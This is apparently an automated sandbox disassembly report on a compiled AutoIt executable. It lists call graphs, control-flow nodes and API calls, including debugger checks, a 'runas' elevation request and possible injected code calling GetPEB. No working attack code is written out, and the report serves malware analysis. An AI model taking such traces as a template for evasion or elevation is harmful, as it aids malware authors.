_flsall 95166->95167 95168 64af75 95167->95168 95169 64af8d 95167->95169 95171 647bda __lseeki64 47 API calls 95168->95171 95170 64b022 95169->95170 95175 64afbf 95169->95175 95172 647bda __lseeki64 47 API calls 95170->95172 95173 64af7a 95171->95173 95176 64b027 95172->95176 95174 647c0e ___libm_error_support 47 API calls 95173->95174 95185 64af82 _flsall 95174->95185 95177 64a8ed ___lock_fhandle 49 API calls 95175->95177 95178 647c0e ___libm_error_support 47 API calls 95176->95178 95179 64afc5 95177->95179 95180 64b02f 95178->95180 95181 64afd8 95179->95181 95182 64afeb 95179->95182 95183 646e10 __cftof2_l 8 API calls 95180->95183 95184 64b043 __chsize_nolock 75 API calls 95181->95184 95186 647c0e ___libm_error_support 47 API calls 95182->95186 95183->95185 95187 64afe4 95184->95187 95185->95136 95188 64aff0 95186->95188 95190 64b01a __flush LeaveCriticalSection 95187->95190 95189 647bda __lseeki64 47 API calls 95188->95189 95189->95187 95190->95185 95192 64a8f9 _flsall 95191->95192 95193 64a946 EnterCriticalSection 95192->95193 95195 647cf4 __lock 47 API calls 95192->95195 95194 64a96c _flsall 95193->95194 95194->95155 95196 64a91d 95195->95196 95197 64a928 InitializeCriticalSectionAndSpinCount 95196->95197 95198 64a93a 95196->95198 95197->95198 95199 64a970 ___lock_fhandle LeaveCriticalSection 95198->95199 95199->95193 95201 64aba4 __lseek_nolock 47 API calls 95200->95201 95204 64eaaa 95201->95204 95202 64eb00 95203 64ab1e __free_osfhnd 48 API calls 95202->95203 95208 64eb08 95203->95208 95204->95202 95205 64eade 95204->95205 95206 64aba4 __lseek_nolock 47 API calls 95204->95206 95205->95202 95207 64aba4 __lseek_nolock 47 API calls 95205->95207 95209 64ead5 95206->95209 95210 64eaea CloseHandle 95207->95210 95213 647bed __dosmaperr 47 API calls 95208->95213 95214 64eb2a 95208->95214 95211 64aba4 __lseek_nolock 47 API calls 95209->95211 95210->95202 95212 64eaf6 GetLastError 95210->95212 95211->95205 95212->95202 95213->95214 95214->95162 95215->95147 95216->95159 95217->95162 95218->95159 95219->95150 95220->95154 95221->95159 95222->94573 95223->94584 95224->94584 95225->94578 95226->94597 95227->94599 95228->94596 95230 64f8a0 __ftell_nolock 95229->95230 95231 6240b4 GetLongPathNameW 95230->95231 95232 626a63 48 API calls 95231->95232 95233 6240dc 95232->95233 95234 6249a0 95233->95234 95235 62d7f7 48 API calls 95234->95235 95236 6249b2 95235->95236 95237 62660f 49 API calls 95236->95237 95238 6249bd 95237->95238 95239 6249c8 95238->95239 95240 692e35 95238->95240 95241 6264cf 48 API calls 95239->95241 95245 692e4f 95240->95245 95287 63d35e 60 API calls 95240->95287 95243 6249d4 95241->95243 95281 6228a6 95243->95281 95246 6249e7 Mailbox 95246->94448 95248 6241a9 136 API calls 95247->95248 95249 62415e 95248->95249 95250 693489 95249->95250 95252 6241a9 136 API calls 95249->95252 95251 66c396 122 API calls 95250->95251 95253 69349e 95251->95253 95254 624172 95252->95254 95255 6934bf 95253->95255 95256 6934a2 95253->95256 95254->95250 95257 62417a 95254->95257 95259 63f4ea 48 API calls 95255->95259 95258 624252 84 API calls 95256->95258 95260 6934aa 95257->95260 95261 624186 95257->95261 95258->95260 95278 693504 Mailbox 95259->95278 95382 666b49 87 API calls _wprintf 95260->95382 95288 62c833 95261->95288 95265 6934b8 95265->95255 95266 6936b4 95267 641c9d _free 47 API calls 95266->95267 95268 6936bc 95267->95268 95269 624252 84 API calls 95268->95269 95274 6936c5 95269->95274 95270 62ba85 48 API calls 95270->95278 95273 641c9d _free 47 API calls 95273->95274 95274->95273 95276 624252 84 API calls 95274->95276 95386 6625b5 86 API calls 4 library calls 95274->95386 95276->95274 95277 62ce19 48 API calls 95277->95278 95278->95266 95278->95270 95278->95274 95278->95277 95376 624dd9 95278->95376 95383 662551 48 API calls _memcpy_s 95278->95383 95384 662472 60 API calls 2 library calls 95278->95384 95385 669c12 48 API calls 95278->95385 95282 6228b8 95281->95282 95286 6228d7 _memcpy_s 95281->95286 95285 63f4ea 48 API calls 95282->95285 95283 63f4ea 48 API calls 95284 6228ee 95283->95284 95284->95246 95285->95286 95286->95283 95287->95240 95289 62c843 __ftell_nolock 95288->95289 95290 62c860 95289->95290 95291 693095 95289->95291 95392 6248ba 49 API calls 95290->95392 95411 6625b5 86 API calls 4 library calls 95291->95411 95294 6930a8 95412 6625b5 86 API calls 4 library calls 95294->95412 95295 62c882 95393 624550 56 API calls 95295->95393 95297 62c897 95297->95294 95299 62c89f 95297->95299 95301 62d7f7 48 API calls 95299->95301 95300 6930c4 95303 62c90c 95300->95303 95302 62c8ab 95301->95302 95394 63e968 49 API calls __ftell_nolock 95302->95394 95305 62c91a 95303->95305 95306 6930d7 95303->95306 95397 641dfc 95305->95397 95309 624907 CloseHandle 95306->95309 95307 62c8b7 95310 62d7f7 48 API calls 95307->95310 95311 6930e3 95309->95311 95312 62c8c3 95310->95312 95313 6241a9 136 API calls 95311->95313 95314 62660f 49 API calls 95312->95314 95316 69310d 95313->95316 95315 62c8d1 95314->95315 95395 63eb66 SetFilePointerEx ReadFile 95315->95395 95319 693136 95316->95319 95323 66c396 122 API calls 95316->95323 95318 62c943 _wcscat _wcscpy 95322 62c96d SetCurrentDirectoryW 95318->95322 95413 6625b5 86 API calls 4 library calls 95319->95413 95320 62c8fd 95396 6246ce SetFilePointerEx SetFilePointerEx 95320->95396 95326 63f4ea 48 API calls 95322->95326 95327 693129 95323->95327 95325 69314d 95335 62cad1 Mailbox 95325->95335 95330 62c988 95326->95330 95328 693131 95327->95328 95329 693152 95327->95329 95331 624252 84 API calls 95328->95331 95332 624252 84 API calls 95329->95332 95333 6247b7 48 API calls 95330->95333 95331->95319 95334 693157 95332->95334 95363 62c993 Mailbox __NMSG_WRITE 95333->95363 95336 63f4ea 48 API calls 95334->95336 95387 6248dd 95335->95387 95343 693194 95336->95343 95337 62ca9d 95407 624907 95337->95407 95341 62caa9 SetCurrentDirectoryW 95341->95335 95342 623d98 95342->94314 95342->94321 95345 62ba85 48 API calls 95343->95345 95367 6931dd Mailbox 95345->95367 95347 6933ce 95418 669b72 48 API calls 95347->95418 95348 693467 95422 6625b5 86 API calls 4 library calls 95348->95422 95352 693480 95352->95337 95353 6933f0 95419 6829e8 48 API calls _memcpy_s 95353->95419 95355 6933fd 95357 641c9d _free 47 API calls 95355->95357 95356 69345f 95421 66240b 48 API calls 3 library calls 95356->95421 95357->95335 95359 62ce19 48 API calls 95359->95363 95361 62ba85 48 API calls 95361->95367 95363->95337 95363->95348 95363->95356 95363->95359 95400 62b337 56 API calls _wcscpy 95363->95400 95401 63c258 GetStringTypeW 95363->95401 95402 62cb93 59 API calls __wcsnicmp 95363->95402 95403 62cb5a GetStringTypeW __NMSG_WRITE 95363->95403 95404 6416d0 GetStringTypeW __towlower_l 95363->95404 95405 62cc24 162 API calls 3 library calls 95363->95405 95406 63c682 48 API calls 95363->95406 95367->95347 95367->95361 95368 62ce19 48 API calls 95367->95368 95371 693420 95367->95371 95414 662551 48 API calls _memcpy_s 95367->95414 95415 662472 60 API calls 2 library calls 95367->95415 95416 669c12 48 API calls 95367->95416 95417 63c682 48 API calls 95367->95417 95368->95367 95420 6625b5 86 API calls 4 library calls 95371->95420 95373 693439 95374 641c9d _free 47 API calls 95373->95374 95375 69344c 95374->95375 95375->95335 95377 624dec 95376->95377 95380 624e9a 95376->95380 95379 63f4ea 48 API calls 95377->95379 95381 624e1e 95377->95381 95378 63f4ea 48 API calls 95378->95381 95379->95381 95380->95278 95381->95378 95381->95380 95382->95265 95383->95278 95384->95278 95385->95278 95386->95274 95388 624907 CloseHandle 95387->95388 95389 6248e5 Mailbox 95388->95389 95390 624907 CloseHandle 95389->95390 95391 6248fc 95390->95391 95391->95342 95392->95295 95393->95297 95394->95307 95395->95320 95396->95303 95423 641e46 95397->95423 95400->95363 95401->95363 95402->95363 95403->95363 95404->95363 95405->95363 95406->95363 95408 624920 95407->95408 95409 624911 95407->95409 95408->95409 95410 624925 CloseHandle 95408->95410 95409->95341 95410->95409 95411->95294 95412->95300 95413->95325 95414->95367 95415->95367 95416->95367 95417->95367 95418->95353 95419->95355 95420->95373 95421->95348 95422->95352 95424 641e61 95423->95424 95427 641e55 95423->95427 95447 647c0e 47 API calls __getptd_noexit 95424->95447 95426 642019 95431 641e41 95426->95431 95448 646e10 8 API calls __cftof2_l 95426->95448 95427->95424 95438 641ed4 95427->95438 95442 649d6b 47 API calls 2 library calls 95427->95442 95430 641fa0 95430->95424 95430->95431 95433 641fb0 95430->95433 95431->95318 95432 641f5f 95432->95424 95434 641f7b 95432->95434 95444 649d6b 47 API calls 2 library calls 95432->95444 95446 649d6b 47 API calls 2 library calls 95433->95446 95434->95424 95434->95431 95437 641f91 95434->95437 95445 649d6b 47 API calls 2 library calls 95437->95445 95438->95424 95441 641f41 95438->95441 95443 649d6b 47 API calls 2 library calls 95438->95443 95441->95430 95441->95432 95442->95438 95443->95441 95444->95434 95445->95431 95446->95431 95447->95426 95448->95431 95450 624c8b 95449->95450 95454 624d94 95449->95454 95451 63f4ea 48 API calls 95450->95451 95450->95454 95452 624cb2 95451->95452 95453 63f4ea 48 API calls 95452->95453 95455 624d22 95453->95455 95454->94454 95455->95454 95456 62b470 91 API calls 95455->95456 95458 624dd9 48 API calls 95455->95458 95459 62ba85 48 API calls 95455->95459 95462 669af1 48 API calls 95455->95462 95456->95455 95458->95455 95459->95455 95460->94456 95461->94458 95462->95455 95464 69418d EnumResourceNamesW 95463->95464 95465 62403c LoadImageW 95463->95465 95466 623ee1 RegisterClassExW 95464->95466 95465->95466 95467 623f53 7 API calls 95466->95467 95467->94473 95469 62f130 95468->95469 95471 62fe30 335 API calls 95469->95471 95475 62f199 95469->95475 95470 62f3dd 95474 6987c8 95470->95474 95483 62f3f2 95470->95483 95517 62f431 Mailbox 95470->95517 95473 698728 95471->95473 95472 62f595 95478 62d7f7 48 API calls 95472->95478 95472->95517 95473->95475 95646 66cc5c 86 API calls 4 library calls 95473->95646 95649 66cc5c 86 API calls 4 library calls 95474->95649 95475->95470 95475->95472 95480 62d7f7 48 API calls 95475->95480 95514 62f229 95475->95514 95479 6987a3 95478->95479 95648 640f0a 52 API calls __cinit 95479->95648 95481 698772 95480->95481 95647 640f0a 52 API calls __cinit 95481->95647 95511 62f418 95483->95511 95650 669af1 48 API calls 95483->95650 95484 698b1b 95495 698b2c 95484->95495 95496 698bcf 95484->95496 95486 62d6e9 55 API calls 95486->95517 95488 62f770 95493 698a45 95488->95493 95509 62f77a 95488->95509 95489 66cc5c 86 API calls 95489->95517 95490 698b7e 95659 67e40a 335 API calls Mailbox 95490->95659 95491 698c53 95664 66cc5c 86 API calls 4 library calls 95491->95664 95492 698810 95651 67eef8 335 API calls 95492->95651 95656 63c1af 48 API calls 95493->95656 95494 62fe30 335 API calls 95512 62f6aa 95494->95512 95658 67f5ee 335 API calls 95495->95658 95661 66cc5c 86 API calls 4 library calls 95496->95661 95497 698beb 95662 67bdbd 335 API calls Mailbox 95497->95662 95499 62fe30 335 API calls 95499->95517 95504 631b90 48 API calls 95504->95517 95508 631b90 48 API calls 95508->95517 95509->95504 95510 698c00 95532 62f537 Mailbox 95510->95532 95663 66cc5c 86 API calls 4 library calls 95510->95663 95511->95484 95511->95512 95511->95517 95512->95488 95512->95494 95513 62fce0 95512->95513 95512->95517 95512->95532 95513->95532 95660 66cc5c 86 API calls 4 library calls 95513->95660 95514->95470 95514->95472 95514->95511 95514->95517 95516 698823 95516->95511 95520 69884b 95516->95520 95517->95486 95517->95489 95517->95490 95517->95491 95517->95497 95517->95499 95517->95508 95517->95513 95517->95532 95645 62dd47 48 API calls _memcpy_s 95517->95645 95657 6597ed InterlockedDecrement 95517->95657 95665 63c1af 48 API calls 95517->95665 95652 67ccdc 48 API calls 95520->95652 95522 698857 95532->94500 95534 634637 95533->95534 95535 63479f 95533->95535 95536 634643 95534->95536 95537 696e05 95534->95537 95538 62ce19 48 API calls 95535->95538 95666 634300 95536->95666 95725 67e822 335 API calls Mailbox 95537->95725 95545 6346e4 Mailbox 95538->95545 95541 634739 Mailbox 95541->94500 95542 696e11 95542->95541 95726 66cc5c 86 API calls 4 library calls 95542->95726 95544 634659 95544->95541 95544->95542 95544->95545 95546 624252 84 API calls 95545->95546 95548 676ff0 335 API calls 95545->95548 95681 666524 95545->95681 95684 66fa0c 95545->95684 95546->95541 95548->95541 95803 62bd30 95550->95803 95552 633267 95554 69907a 95552->95554 95555 6332f8 95552->95555 95612 633628 95552->95612 95821 66cc5c 86 API calls 4 library calls 95554->95821 95815 63c36b 86 API calls 95555->95815 95559 633313 95610 6334eb _memcpy_s Mailbox 95559->95610 95559->95612 95616 6994df 95559->95616 95808 622b7a 95559->95808 95560 6991fa 95826 66cc5c 86 API calls 4 library calls 95560->95826 95564 6993c5 95569 62fe30 335 API calls 95564->95569 95565 69926d 95830 66cc5c 86 API calls 4 library calls 95565->95830 95566 69909a 95566->95560 95567 62d645 53 API calls 95566->95567 95570 69910c 95567->95570 95571 699407 95569->95571 95573 699220 95570->95573 95574 699114 95570->95574 95577 62d6e9 55 API calls 95571->95577 95571->95612 95583 699438 95577->95583 95835 66cc5c 86 API calls 4 library calls 95583->95835 95585 62fe30 335 API calls 95585->95610 95592 63c3c3 48 API calls 95592->95610 95604 63f4ea 48 API calls 95604->95610 95606 63351f 95608 626eed 48 API calls 95606->95608 95609 633540 95606->95609 95608->95609 95609->95612 95615 6994b0 95609->95615 95618 633585 95609->95618 95610->95564 95610->95565 95610->95566 95610->95583 95610->95585 95610->95592 95610->95604 95610->95606 95611 699394 95610->95611 95610->95612 95817 62d9a0 53 API calls __cinit 95610->95817 95818 62d8c0 53 API calls 95610->95818 95819 63c2d6 48 API calls _memcpy_s 95610->95819 95831 67cda2 82 API calls Mailbox 95610->95831 95832 6680e3 53 API calls 95610->95832 95833 62d764 55 API calls 95610->95833 95834 62dcae 50 API calls Mailbox 95610->95834 95614 63f4ea 48 API calls 95611->95614 95621 633635 Mailbox 95612->95621 95820 66cc5c 86 API calls 4 library calls 95612->95820 95614->95564 95616->95612 95838 66cc5c 86 API calls 4 library calls 95616->95838 95618->95612 95618->95616 95619 633615 95618->95619 95621->94500 95623 69df42 95622->95623 95624 63e253 95622->95624 95625 69df77 95623->95625 95626 69df59 TranslateAcceleratorW 95623->95626 95624->94500 95626->95624 95628 63dca3 95627->95628 95630 63dc71 95627->95630 95628->94500 95629 63dc96 IsDialogMessageW 95629->95628 95629->95630 95630->95628 95630->95629 95631 69dd1d GetClassLongW 95630->95631 95631->95629 95631->95630 95632->94500 95633->94500 95634->94479 95635->94483 95636->94488 95637->94500 95638->94500 95639->94529 95640->94529 95641->94529 95642->94529 95643->94529 95644->94529 95645->95517 95646->95475 95647->95514 95648->95517 95649->95532 95650->95492 95651->95516 95652->95522 95656->95517 95657->95517 95658->95517 95659->95513 95660->95532 95661->95532 95662->95510 95663->95532 95664->95532 95665->95517 95667 696e60 95666->95667 95670 63432c 95666->95670 95728 66cc5c 86 API calls 4 library calls 95667->95728 95669 696e71 95729 66cc5c 86 API calls 4 library calls 95669->95729 95670->95669 95677 634366 _memcpy_s 95670->95677 95672 634435 95678 634445 95672->95678 95727 67cda2 82 API calls Mailbox 95672->95727 95674 63f4ea 48 API calls 95674->95677 95675 6344b1 95675->95544 95676 62fe30 335 API calls 95676->95677 95677->95672 95677->95674 95677->95676 95677->95678 95679 696ebd 95677->95679 95678->95544 95730 66cc5c 86 API calls 4 library calls 95679->95730 95731 666ca9 GetFileAttributesW 95681->95731 95685 66fa1c __ftell_nolock 95684->95685 95686 66fa44 95685->95686 95796 62d286 48 API calls 95685->95796 95688 62936c 81 API calls 95686->95688 95689 66fa5e 95688->95689 95690 66fa80 95689->95690 95691 66fb68 95689->95691 95701 66fb92 95689->95701 95692 62936c 81 API calls 95690->95692 95693 6241a9 136 API calls 95691->95693 95701->95541 95725->95542 95726->95541 95727->95675 95728->95669 95729->95678 95730->95678 95732 666529 95731->95732 95733 666cc4 FindFirstFileW 95731->95733 95732->95541 95733->95732 95734 666cd9 FindClose 95733->95734 95734->95732 95796->95686 95804 62bd3f 95803->95804 95807 62bd5a 95803->95807 95805 62bdfa 48 API calls 95804->95805 95806 62bd47 CharUpperBuffW 95805->95806 95806->95807 95807->95552 95809 69436a 95808->95809 95810 622b8b 95808->95810 95811 63f4ea 48 API calls 95810->95811 95812 622b92 95811->95812 95815->95559 95817->95610 95818->95610 95819->95610 95820->95621 95821->95559 95826->95612 95830->95612 95831->95610 95832->95610 95833->95610 95834->95610 95835->95612 95838->95612 95840 14ded30 95841 14dc980 GetPEB 95840->95841 95842 14dee1b 95841->95842 95854 14dec20 95842->95854 95855 14dec29 Sleep 95854->95855 95856 14dec37 95855->95856 95857 699c06 95868 63d3be 95857->95868 95859 699c1c 95860 699c91 Mailbox 95859->95860 95877 621caa 49 API calls 95859->95877 95863 633200 335 API calls 95860->95863 95862 699c71 95865 699cc5 95862->95865 95878 66b171 48 API calls 95862->95878 95863->95865 95866 69a7ab Mailbox 95865->95866 95879 66cc5c 86 API calls 4 library calls 95865->95879 95869 63d3ca 95868->95869 95870 63d3dc 95868->95870 95880 62dcae 50 API calls Mailbox 95869->95880 95872 63d3e2 95870->95872 95873 63d40b 95870->95873 95874 63f4ea 48 API calls 95872->95874 95881 62dcae 50 API calls Mailbox 95873->95881 95876 63d3d4 95874->95876 95876->95859 95877->95862 95878->95860 95879->95866 95880->95876 95881->95876

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 856 64b043-64b080 call 64f8a0 859 64b082-64b084 856->859 860 64b089-64b08b 856->860 861 64b860-64b86c call 64a70c 859->861 862 64b0ac-64b0d9 860->862 863 64b08d-64b0a7 call 647bda call 647c0e call 646e10 860->863 866 64b0e0-64b0e7 862->866 867 64b0db-64b0de 862->867 863->861 871 64b105 866->871 872 64b0e9-64b100 call 647bda call 647c0e call 646e10 866->872 867->866 870 64b10b-64b110 867->870 874 64b112-64b11c call 64f82f 870->874 875 64b11f-64b12d call 653bf2 870->875 871->870 902 64b851-64b854 872->902 874->875 887 64b133-64b145 875->887 888 64b44b-64b45d 875->888 887->888 892 64b14b-64b183 call 647a0d GetConsoleMode 887->892 889 64b463-64b473 888->889 890 64b7b8-64b7d5 WriteFile 888->890 893 64b479-64b484 889->893 894 64b55a-64b55f 889->894 896 64b7d7-64b7df 890->896 897 64b7e1-64b7e7 GetLastError 890->897 892->888 906 64b189-64b18f 892->906 900 64b48a-64b49a 893->900 901 64b81b-64b833 893->901 904 64b565-64b56e 894->904 905 64b663-64b66e 894->905 903 64b7e9 896->903 897->903 907 64b4a0-64b4a3 900->907 908 64b835-64b838 901->908 909 64b83e-64b84e call 647c0e call 647bda 901->909 913 64b85e-64b85f 902->913 911 64b7ef-64b7f1 903->911 904->901 912 64b574 904->912 905->901 910 64b674 905->910 914 64b191-64b193 906->914 915 64b199-64b1bc GetConsoleCP 906->915 916 64b4a5-64b4be 907->916 917 64b4e9-64b520 WriteFile 907->917 908->909 918 64b83a-64b83c 908->918 909->902 919 64b67e-64b693 910->919 921 64b856-64b85c 911->921 922 64b7f3-64b7f5 911->922 923 64b57e-64b595 912->923 913->861 914->888 914->915 924 64b440-64b446 915->924 925 64b1c2-64b1ca 915->925 926 64b4c0-64b4ca 916->926 927 64b4cb-64b4e7 916->927 917->897 928 64b526-64b538 917->928 918->913 929 64b699-64b69b 919->929 921->913 922->901 931 64b7f7-64b7fc 922->931 932 64b59b-64b59e 923->932 924->922 935 64b1d4-64b1d6 925->935 926->927 927->907 927->917 928->911 936 64b53e-64b54f 928->936 937 64b69d-64b6b3 929->937 938 64b6d8-64b719 WideCharToMultiByte 929->938 940 64b812-64b819 call 647bed 931->940 941 64b7fe-64b810 call 647c0e call 647bda 931->941 933 64b5a0-64b5b6 932->933 934 64b5de-64b627 WriteFile 932->934 942 64b5cd-64b5dc 933->942 943 64b5b8-64b5ca 933->943 934->897 944 64b62d-64b645 934->944 946 64b1dc-64b1fe 935->946 947 64b36b-64b36e 935->947 936->900 948 64b555 936->948 949 64b6b5-64b6c4 937->949 950 64b6c7-64b6d6 937->950 938->897 952 64b71f-64b721 938->952 940->902 941->902 942->932 942->934 943->942 944->911 956 64b64b-64b658 944->956 958 64b217-64b223 call 641688 946->958 959 64b200-64b215 946->959 960 64b375-64b3a2 947->960 961 64b370-64b373 947->961 948->911 949->950 950->929 950->938 954 64b727-64b75a WriteFile 952->954 962 64b75c-64b776 954->962 963 64b77a-64b78e GetLastError 954->963 956->923 965 64b65e 956->965 980 64b225-64b239 958->980 981 64b269-64b26b 958->981 966 64b271-64b283 call 6540f7 959->966 968 64b3a8-64b3ab 960->968 961->960 961->968 962->954 971 64b778 962->971 974 64b794-64b796 963->974 965->911 983 64b435-64b43b 966->983 984 64b289 966->984 969 64b3b2-64b3c5 call 655884 968->969 970 64b3ad-64b3b0 968->970 969->897 989 64b3cb-64b3d5 969->989 970->969 976 64b407-64b40a 970->976 971->974 974->903 979 64b798-64b7b0 974->979 976->935 986 64b410 976->986 979->919 985 64b7b6 979->985 987 64b412-64b42d 980->987 988 64b23f-64b254 call 6540f7 980->988 981->966 983->903 990 64b28f-64b2c4 WideCharToMultiByte 984->990 985->911 986->983 987->983 988->983 998 64b25a-64b267 988->998 992 64b3d7-64b3ee call 655884 989->992 993 64b3fb-64b401 989->993 990->983 994 64b2ca-64b2f0 WriteFile 990->994 992->897 1001 64b3f4-64b3f5 992->1001 993->976 994->897 997 64b2f6-64b30e 994->997 997->983 1000 64b314-64b31b 997->1000 998->990 1000->993 1002 64b321-64b34c WriteFile 1000->1002 1001->993 1002->897 1003 64b352-64b359 1002->1003 1003->983 1004 64b35f-64b366 1003->1004 1004->993
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3adf484a9d1f5b9acd617d81420c50a957b85a120dda66e82400fdd02b043130
                                                                    • Instruction ID: 6948ba21be1c977ef5c5df1fa40bb83a3ee8c8c47858bf10fa168deece35b549
                                                                    • Opcode Fuzzy Hash: 3adf484a9d1f5b9acd617d81420c50a957b85a120dda66e82400fdd02b043130
                                                                    • Instruction Fuzzy Hash: BC325A75B022288FDB249F54DC81AE9B7F6FF4A310F1850D9E40AA7A85D7309E81CF52

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00623AA3,?), ref: 00623D45
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00623AA3,?), ref: 00623D57
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,006E1148,006E1130,?,?,?,?,00623AA3,?), ref: 00623DC8
                                                                      • Part of subcall function 00626430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623DEE,006E1148,?,?,?,?,?,00623AA3,?), ref: 00626471
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00623AA3,?), ref: 00623E48
                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006D28F4,00000010), ref: 00691CCE
                                                                    • SetCurrentDirectoryW.KERNEL32(?,006E1148,?,?,?,?,?,00623AA3,?), ref: 00691D06
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006BDAB4,006E1148,?,?,?,?,?,00623AA3,?), ref: 00691D89
                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00623AA3), ref: 00691D90
                                                                      • Part of subcall function 00623E6E: GetSysColorBrush.USER32(0000000F), ref: 00623E79
                                                                      • Part of subcall function 00623E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00623E88
                                                                      • Part of subcall function 00623E6E: LoadIconW.USER32(00000063), ref: 00623E9E
                                                                      • Part of subcall function 00623E6E: LoadIconW.USER32(000000A4), ref: 00623EB0
                                                                      • Part of subcall function 00623E6E: LoadIconW.USER32(000000A2), ref: 00623EC2
                                                                      • Part of subcall function 00623E6E: RegisterClassExW.USER32(?), ref: 00623F30
                                                                      • Part of subcall function 006236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006236E6
                                                                      • Part of subcall function 006236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623707
                                                                      • Part of subcall function 006236B8: ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 0062371B
                                                                      • Part of subcall function 006236B8: ShowWindow.USER32(00000000,?,?,?,?,00623AA3,?), ref: 00623724
                                                                      • Part of subcall function 00624FFC: _memset.LIBCMT ref: 00625022
                                                                      • Part of subcall function 00624FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006250CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                    • String ID: ()m$This is a third-party compiled AutoIt script.$runas
                                                                    • API String ID: 438480954-333318816
                                                                    • Opcode ID: b855cf2d083756a5f652dd3158bab1e458b68261f2bdaf9dc61b0d53e865bb59
                                                                    • Instruction ID: dee8b57db497728c1e63cb632b8158baf81471b06f620992f2371ae272c82a25
                                                                    • Opcode Fuzzy Hash: b855cf2d083756a5f652dd3158bab1e458b68261f2bdaf9dc61b0d53e865bb59
                                                                    • Instruction Fuzzy Hash: C75106309047A9AACF11BBB0EC55DED7B7B9F17700F00406AF6426E292DB74564A9F21

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1350 63ddc0-63de4f call 62d7f7 GetVersionExW call 626a63 call 63dfb4 call 626571 1359 6924c8-6924cb 1350->1359 1360 63de55-63de56 1350->1360 1361 6924cd 1359->1361 1362 6924e4-6924e8 1359->1362 1363 63de92-63dea2 call 63df77 1360->1363 1364 63de58-63de63 1360->1364 1365 6924d0 1361->1365 1366 6924ea-6924f3 1362->1366 1367 6924d3-6924dc 1362->1367 1377 63dec7-63dee1 1363->1377 1378 63dea4-63dec1 GetCurrentProcess call 63df5f 1363->1378 1368 69244e-692454 1364->1368 1369 63de69-63de6b 1364->1369 1365->1367 1366->1365 1373 6924f5-6924f8 1366->1373 1367->1362 1371 69245e-692464 1368->1371 1372 692456-692459 1368->1372 1374 692469-692475 1369->1374 1375 63de71-63de74 1369->1375 1371->1363 1372->1363 1373->1367 1379 69247f-692485 1374->1379 1380 692477-69247a 1374->1380 1381 63de7a-63de89 1375->1381 1382 692495-692498 1375->1382 1384 63dee3-63def7 call 63e00c 1377->1384 1385 63df31-63df3b GetSystemInfo 1377->1385 1378->1377 1401 63dec3 1378->1401 1379->1363 1380->1363 1386 69248a-692490 1381->1386 1387 63de8f 1381->1387 1382->1363 1388 69249e-6924b3 1382->1388 1398 63df29-63df2f GetSystemInfo 1384->1398 1399 63def9-63df01 call 63dff4 GetNativeSystemInfo 1384->1399 1390 63df0e-63df1a 1385->1390 1386->1363 1387->1363 1392 6924bd-6924c3 1388->1392 1393 6924b5-6924b8 1388->1393 1394 63df21-63df26 1390->1394 1395 63df1c-63df1f FreeLibrary 1390->1395 1392->1363 1393->1363 1395->1394 1400 63df03-63df07 1398->1400 1399->1400 1400->1390 1404 63df09-63df0c FreeLibrary 1400->1404 1401->1377 1404->1390
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 0063DDEC
                                                                    • GetCurrentProcess.KERNEL32(00000000,006BDC38,?,?), ref: 0063DEAC
                                                                    • GetNativeSystemInfo.KERNELBASE(?,006BDC38,?,?), ref: 0063DF01
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0063DF0C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0063DF1F
                                                                    • GetSystemInfo.KERNEL32(?,006BDC38,?,?), ref: 0063DF29
